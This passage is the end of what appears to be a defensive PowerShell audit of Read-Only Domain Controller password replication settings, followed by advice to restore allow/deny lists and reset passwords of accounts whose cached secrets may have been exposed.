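        Findings   = if ($findings) { $findings -join '; ' } else { 'OK' }
    }
}
```

Any RODC reported with findings should have its allow/deny lists restored and, because a cached privileged secret may already have been extracted, the affected account's password reset.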